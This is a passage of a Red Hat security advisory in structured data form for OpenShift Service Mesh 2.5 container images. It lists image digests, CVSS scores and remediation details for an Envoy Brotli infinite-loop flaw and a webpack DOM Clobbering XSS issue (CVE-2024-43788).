"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: Brotli decompressor infinite loop", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", 